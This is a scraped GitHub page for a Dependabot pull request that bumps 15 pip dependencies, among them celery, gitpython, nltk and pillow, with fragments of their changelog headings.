dependency-type: direct:production dependency-group: pip - dependency-name: celery dependency-type: direct:production dependency-group: pip - dependency-name: gitpython dependency-type: direct:production dependency-group: pip - dependency-name: orjson dependency-type: direct:production dependency-group: pip - dependency-name: nltk dependency-type: direct:production dependency-group: pip - dependency-name: azure-storage-blob dependency-type: direct:production dependency-group: pip - dependency-name: django-debug-toolbar dependency-type: direct:production dependency-group: pip - dependency-name: pillow dependency-type: direct:production dependency-group: pip - dependency-name: mercurial dependency-type: direct:production dependency-group: pip - dependency-name: yamale dependency-type: direct:production dependency-group: pip ... Signed-off-by: dependabot[bot] <[email protected]>

dependabot bot added dependencies Pull requests that update a dependency file python Pull requests that update Python code labels Jun 28, 2024

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Uh oh!

Bump the pip group across 1 directory with 15 updates #7

Bump the pip group across 1 directory with 15 updates #7

Uh oh!

dependabot bot commented on behalf of github Jun 28, 2024

Uh oh!

Uh oh!

Bump the pip group across 1 directory with 15 updates #7

Are you sure you want to change the base?

Bump the pip group across 1 directory with 15 updates #7

Uh oh!

Conversation

dependabot bot commented on behalf of github Jun 28, 2024

23.3 (2023-10-15)

Process

Deprecations and Removals

Features

Bug Fixes

Vendored Libraries

Version 3.15.1

What's Changed

New Contributors

Version 3.14.0

Version 3.13.1

Version 3.13.0

3.12.4

Version 2.4.0

Version 2.3.0

Version 2.4.0 (2020-9-27)

Version 2.3.0 (2020-6-5)

Version 2.2 (2019-7-16)

Version 2.1 (2019-1-20)

v2.32.2

2.32.2 (2024-05-21)

v2.32.1

2.32.1 (2024-05-20)

v2.32.0

2.32.0 (2024-05-20)

🐍 PYCON US 2024 EDITION 🐍

2.32.2 (2024-05-21)

2.32.1 (2024-05-20)

2.32.0 (2024-05-20)

5.2 (2019-12-02)

5.2.2

v5.2.1

5.2.2

5.2.1

3.1.41 - fix Windows security issue

What's Changed

3.9.15

Fixed

3.9.14

Fixed

Changed

3.9.13

Fixed

Changed

3.9.12

Fixed

Changed

3.9.11

Changed

3.9.10

Fixed

3.9.9

Changed

3.9.15 - 2024-02-23

Fixed

3.9.14 - 2024-02-14

Fixed

Changed

3.9.13 - 2024-02-03

Fixed

Changed

3.9.12 - 2024-01-18

Changed

Uh oh!

Uh oh!